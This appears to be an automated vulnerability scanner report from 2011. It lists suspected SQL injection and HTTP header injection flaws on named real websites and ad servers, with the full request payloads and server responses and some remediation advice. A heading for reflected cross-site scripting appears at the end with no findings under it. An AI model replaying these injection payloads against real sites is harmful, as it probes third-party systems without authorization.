XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07232011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://web2.checkm8.com
Path:	/adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 1

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=d1LS96wDHW31vc9HH6Mca;Path=/;
Set-cookie: C=oeMS96wzNNT9cdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 170777909/1244522061/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 2

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oeMS96wE8Z4ZcdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 152987262/1226731317/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.betabeat.com
Path:	/wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11107432'%20or%201%3d1--%20 and 11107432'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content11107432'%20or%201%3d1--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=1-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content11107432'%20or%201%3d2--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=2-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.betabeat.com
Path:	/wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.betabeat.com
Path:	/wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20937989'%20or%201%3d1--%20 and 20937989'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d1--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=1-- /images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d2--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=2-- /images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.observer.com
Path:	/wp-content/themes/nyo_tech/images/observer.png

Issue detail

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.observer.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.observer.com Port 80</address>
</body></html>

2. HTTP header injection previous next
There are 4 instances of this issue:

/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]
/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]
/adj/scmag.hmktus/sc [REST URL parameter 1]
/getcamphist [src parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/x1.aud/capitalone/exclusion

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 857aa%0d%0a08a4076f552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /857aa%0d%0a08a4076f552/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/857aa
08a4076f552/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567:
Date: Fri, 22 Jul 2011 20:31:34 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5762.interclick.com/B5644777.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 52bf7%0d%0ab0653725eae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /52bf7%0d%0ab0653725eae/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http://a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic?;ord=634468586978366444? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/52bf7
b0653725eae/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http: //a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic
Date: Thu, 21 Jul 2011 19:32:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scmag.hmktus/sc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8bcac%0d%0aa53c51e38c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8bcac%0d%0aa53c51e38c5/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8bcac
a53c51e38c5/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900:
Date: Fri, 22 Jul 2011 20:15:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/getcamphist [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload b4827%0d%0a1a9ebdf4b81 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Capplehome%2F1%2FH.22.1%2Fs45228154349606%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D21%252F6%252F2011%252015%253A25%253A9%25204%2520300%26pageName%3Dapple%2520-%2520index%252Ftab%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.homepage%26c4%3DD%253Dg%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Capplehome%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dhomepage%253D1%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D723%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BWPI%2520Detector%25201.3%253BDefault%2520Plug-in%253B%26AQE%3D1b4827%0d%0a1a9ebdf4b81&A2S=1;ord=1742714097 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606?AQB=1&vvpr=true&&ndh=1&t=21%2F6%2F2011%2015%3A25%3A9%204%20300&pageName=apple%20-%20index%2Ftab%20(us)&g=http%3A%2F%2Fwww.apple.com%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.homepage&c4=D%3Dg&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Capplehome&c48=1&c49=D%3Ds_vi&c50=homepage%3D1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&AQE=1b4827
1a9ebdf4b81&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1311279927:
Date: Thu, 21 Jul 2011 20:25:27 GMT
Server: GFE/2.0
Content-Type: text/html

3. Cross-site scripting (reflected) previous next
